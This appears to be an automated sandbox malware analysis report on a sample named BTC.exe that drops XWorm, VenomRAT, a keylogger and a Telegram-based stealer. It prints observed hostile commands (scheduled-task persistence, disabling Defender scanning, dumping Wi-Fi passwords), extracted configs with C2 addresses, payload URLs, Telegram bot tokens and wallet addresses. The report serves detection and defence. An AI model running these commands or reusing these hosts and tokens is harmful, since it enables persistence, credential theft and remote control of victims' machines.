                          • 0x760f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                          • 0x7724:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                          • 0x70ce:$cnc4: POST / HTTP/1.1
                          0.2.BTC.exe.2c75848.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                            Click to see the 83 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\BTC.exe, ProcessId: 2796, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Cracked.exe" , ParentImage: C:\Users\user\AppData\Roaming\Cracked.exe, ParentProcessId: 5524, ParentProcessName: Cracked.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, ProcessId: 6588, ProcessName: cmd.exe
                            Sigma detected: Invoke-Obfuscation VAR+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Cracked.exe" , ParentImage: C:\Users\user\AppData\Roaming\Cracked.exe, ParentProcessId: 5524, ParentProcessName: Cracked.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, ProcessId: 6588, ProcessName: cmd.exe
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Window Security.exe" , ParentImage: C:\Users\user\AppData\Roaming\Window Security.exe, ParentProcessId: 2680, ParentProcessName: Window Security.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, ProcessId: 7476, ProcessName: powershell.exe
                            Sigma detected: Powershell Defender Disable Scan Feature
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Window Security.exe" , ParentImage: C:\Users\user\AppData\Roaming\Window Security.exe, ParentProcessId: 2680, ParentProcessName: Window Security.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, ProcessId: 7476, ProcessName: powershell.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BTC.exe", ParentImage: C:\Users\user\Desktop\BTC.exe, ParentProcessId: 2796, ParentProcessName: BTC.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1716, ProcessName: svchost.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, ProcessId: 7140, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender Service Host
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, ProcessId: 7140, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk
                            Sigma detected: Suspicious Add Scheduled Task Parent
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Window Security.exe" , ParentImage: C:\Users\user\AppData\Roaming\Window Security.exe, ParentProcessId: 2680, ParentProcessName: Window Security.exe, ProcessCommandLine: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f, ProcessId: 5800, ProcessName: schtasks.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' , ProcessId: 5556, ProcessName: schtasks.exe
                            Sigma detected: Suspicious desktop.ini Action
                            Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 1716, TargetFilename: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini
                            Sigma detected: Uncommon Svchost Parent Process
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BTC.exe", ParentImage: C:\Users\user\Desktop\BTC.exe, ParentProcessId: 2796, ParentProcessName: BTC.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1716, ProcessName: svchost.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" Get-MpPreference -verbose, CommandLine: "powershell" Get-MpPreference -verbose, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Window Security.exe" , ParentImage: C:\Users\user\AppData\Roaming\Window Security.exe, ParentProcessId: 2680, ParentProcessName: Window Security.exe, ProcessCommandLine: "powershell" Get-MpPreference -verbose, ProcessId: 5580, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BTC.exe", ParentImage: C:\Users\user\Desktop\BTC.exe, ParentProcessId: 2796, ParentProcessName: BTC.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1716, ProcessName: svchost.exe

                            Stealing of Sensitive Information

                            barindex
                            Sigma detected: Capture Wi-Fi password
                            Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\update.exe" , ParentImage: C:\Users\user\AppData\Roaming\update.exe, ParentProcessId: 1632, ParentProcessName: update.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7152, ProcessName: cmd.exe

                            Suricata Signatures

                            Timestamp:2024-09-03T06:15:58.964537+0200
                            SID:2049872
                            Severity:1
                            Source Port:49705
                            Destination Port:443
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-09-03T06:15:58.964613+0200
                            SID:2045614
                            Severity:1
                            Source Port:443
                            Destination Port:49705
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-09-03T06:16:41.916861+0200
                            SID:2031009
                            Severity:1
                            Source Port:49728
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-09-03T06:16:41.916861+0200
                            SID:2044766
                            Severity:1
                            Source Port:49728
                            Destination Port:443
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-09-03T06:15:58.451017+0200
                            SID:2036383
                            Severity:1
                            Source Port:49706
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-09-03T06:16:42.593395+0200
                            SID:2803305
                            Severity:3
                            Source Port:49730
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Unknown Traffic
                            Timestamp:2024-09-03T06:16:41.704665+0200
                            SID:2031009
                            Severity:1
                            Source Port:49729
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-09-03T06:16:41.704665+0200
                            SID:2044766
                            Severity:1
                            Source Port:49729
                            Destination Port:443
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-09-03T06:16:39.987059+0200
                            SID:2855924
                            Severity:1
                            Source Port:49719
                            Destination Port:7812
                            Protocol:TCP
                            Classtype:Malware Command and Control Activity Detected
                            Timestamp:2024-09-03T06:16:04.017776+0200
                            SID:2036383
                            Severity:1
                            Source Port:49707
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-09-03T06:16:48.962020+0200
                            SID:2044557
                            Severity:1
                            Source Port:49734
                            Destination Port:443
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:2024-09-03T06:16:42.985167+0200
                            SID:2803305
                            Severity:3
                            Source Port:49731
                            Destination Port:443
                            Protocol:TCP
                            Classtype:Unknown Traffic
                            Timestamp:2024-09-03T06:16:05.473252+0200
                            SID:2853685
                            Severity:1
                            Source Port:49708
                            Destination Port:443
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: BTC.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: https://payloads-poison.000webhostapp.com/r77-x86.dllAvira URL Cloud: Label: phishing
                            Source: https://payloads-poison.000webhostapp.com/r77-x64.dllAvira URL Cloud: Label: phishing
                            Source: http://payloads-poison.000webhostapp.comAvira URL Cloud: Label: phishing
                            Source: https://payloads-poison.000webhostapp.com/r77-x64.dllkhttps://payloads-poison.000webhostapp.com/r77-Avira URL Cloud: Label: phishing
                            Source: https://payloads-poison.000webhostapp.comAvira URL Cloud: Label: phishing
                            Source: http://us-east-1.route-1.000webhost.awex.ioAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VenomRAT {"Server": "185.252.232.158,64.23.232.116", "Ports": "7812", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Windows Security Health Service.exe", "AES_key": "U7UKNtJ34LgchwZODOfzzFcHW2nq5BGM", "Mutex": "vsvf", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "MB7+7eQe3o/mr34a8NEaPDlYEbTJe3GITCSUNhGbTCbTlGn/dXnmzv6/FdZSuAlv0XJWcYHF/Q7TuCeusJI910cY/I6m4fHm3HdMCvzVYKl83ynyD0SsNszljpqC1g/jNVcnhSAOQSUOWT6s3TKuQxwrW62ZBFDfFXrylSK+fdM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "true", "AntiVM": "false"}
                            Source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "185.252.232.158,64.23.232.116", "Ports": "7812", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Windows Security Health Service.exe", "AES_key": "U7UKNtJ34LgchwZODOfzzFcHW2nq5BGM", "Mutex": "vsvf", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "MB7+7eQe3o/mr34a8NEaPDlYEbTJe3GITCSUNhGbTCbTlGn/dXnmzv6/FdZSuAlv0XJWcYHF/Q7TuCeusJI910cY/I6m4fHm3HdMCvzVYKl83ynyD0SsNszljpqC1g/jNVcnhSAOQSUOWT6s3TKuQxwrW62ZBFDfFXrylSK+fdM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "true", "AntiVM": "false"}
                            Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["146.190.29.250", "165.227.91.90", "167.99.94.206"], "Port": "7812", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148"}
                            Source: 6.0.Window Security.exe.ce0000.0.unpackMalware Configuration Extractor: Vermin Keylogger {"Version": "2.1.0.0", "Host:Port": "146.190.29.250:7812;", "SubDirectory": "SubDir34", "InstallName": "Windows Security.exe", "MutexName": "VNM_MUTEX_h1gQxrpyccCFZq7JPS", "StartupKey": "Windows Update", "Tag": "Office04", "LogDirectoryName": "Logs"}
                            Source: crack.exe.5972.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 310366, "from": {"id": 5904946097, "is_bot": true, "first_name": "Vilva789", "username": "Vilva814bot"}, "chat": {"id": 5881759996, "first_name": "BTC USDT", "last_name": "FLASH\ud83d\udd25", "username": "flashusdtbtcsender", "type": "private"}, "date": 1725336958, "text": "This Not RDP"}}]}
                            Multi AV Scanner detection for domain / URL
                            Source: payloads-poison.000webhostapp.comVirustotal: Detection: 14%Perma Link
                            Source: http://91.134.207.16/svchost.exeVirustotal: Detection: 10%Perma Link
                            Source: https://payloads-poison.000webhostapp.com/r77-x86.dllVirustotal: Detection: 7%Perma Link
                            Source: http://91.134.207.16/WinSCP.comVirustotal: Detection: 7%Perma Link
                            Source: http://91.134.207.16/ngrok.exeVirustotal: Detection: 8%Perma Link
                            Source: http://91.134.207.16/Install.exeVirustotal: Detection: 11%Perma Link
                            Source: http://91.134.207.16/autoupdate1.exeVirustotal: Detection: 12%Perma Link
                            Source: http://91.134.207.16/rdpinstall.exeVirustotal: Detection: 10%Perma Link
                            Source: http://91.134.207.16/update.exeVirustotal: Detection: 11%Perma Link
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeReversingLabs: Detection: 100%
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeReversingLabs: Detection: 100%
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeReversingLabs: Detection: 81%
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\crack.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 100%
                            Source: C:\Users\user\AppData\Roaming\update.exeReversingLabs: Detection: 95%
                            Multi AV Scanner detection for submitted file
                            Source: BTC.exeVirustotal: Detection: 63%Perma Link
                            Yara detected Vermin Keylogger
                            Source: Yara matchFile source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for sample
                            Source: BTC.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: 146.190.29.250,165.227.91.90,167.99.94.206
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: 7812
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: <123456789>
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: <Xwormmm>
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: XWorm V5.2
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: USB.exe
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: %AppData%
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: Windows Defender Service Host.exe
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: bc1qqe5ggjpyw4gyw79vqysj8x6w3jpx20ad5lj2zl
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: 0x18313842dfF02262dCb1FeCa9E908174be47AE8d
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: TT95VUx37LfK4FFesVShkzpKS5LK9udS2p
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: 7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpackString decryptor: 6291749148
                            Source: BTC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 145.14.144.231:443 -> 192.168.2.5:49721 version: TLS 1.0
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49725 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2
                            Source: BTC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: winload_prod.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: ntkrnlmp.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdbT0n0 `0_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: winload_prod.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdbMCgC YC_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49719 -> 146.190.29.250:7812
                            Source: Network trafficSuricata IDS: 2036383 - Severity 1 - ET MALWARE Common RAT Connectivity Check Observed : 192.168.2.5:49706 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2036383 - Severity 1 - ET MALWARE Common RAT Connectivity Check Observed : 192.168.2.5:49707 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49708 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.5:49728 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2049872 - Severity 1 - ET MALWARE Rezlt RDP Grabber - This is Not RDP : 192.168.2.5:49705 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.5:49729 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.5:49728 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.5:49729 -> 149.154.167.220:443
